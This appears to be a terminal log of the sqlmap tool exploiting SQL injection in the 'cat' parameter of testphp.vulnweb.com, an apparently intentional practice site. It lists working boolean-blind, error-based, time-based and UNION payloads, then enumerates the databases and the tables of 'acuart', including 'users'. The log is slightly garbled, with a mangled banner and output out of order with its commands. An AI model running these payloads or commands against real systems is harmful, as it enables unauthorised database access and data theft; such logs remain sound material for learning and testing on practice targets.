root@localhost:~/sqlmap# python3 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
        ___
       __H__                                                                             ___ ___["]_____ ___ ___  {1.6.10.8#dev}
|_ -| . [']     | .'| . |                                                               |___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:39:55 /2022-10-28/                                                                                                                                            [03:39:56] [INFO] resuming back-end DBMS 'mysql'
[03:39:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause                                 Payload: cat=1 AND 5778=5778

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: cat=1 AND GTID_SUBSET(CONCAT(0x7171787171,(SELECT (ELT(6686=6686,1))),0x71626b6b71),6686)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cat=1 AND (SELECT 8361 FROM (SELECT(SLEEP(5)))LukA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL,CONCAT(0x7171787171,0x4867434a654d4b70715653796c72525252715363704367744d576a6f51627279747779614f616573,0x71626b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[03:39:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[03:39:58] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[03:39:58] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 03:39:58 /2022-10-28/8

________

[03:45:26] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

[03:45:27] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 03:45:27 /2022-10-28/

root@localhost:~/sqlmap# python3 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs -D acuart  –-tables
